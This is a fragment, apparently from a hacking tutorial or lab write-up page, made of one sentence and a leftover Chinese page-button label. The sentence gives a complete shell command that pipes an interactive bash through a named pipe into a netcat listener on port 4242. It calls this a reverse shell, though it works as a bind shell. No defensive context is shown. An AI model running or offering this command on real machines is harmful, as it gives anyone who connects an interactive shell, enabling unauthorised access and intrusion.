Let us now set up a reverse shell on this machine using e.g. mkfifo test; /bin/bash -i -l 0<test 2>&1 | nc -l -p 4242 2>&1 >test .
確定! 回上一頁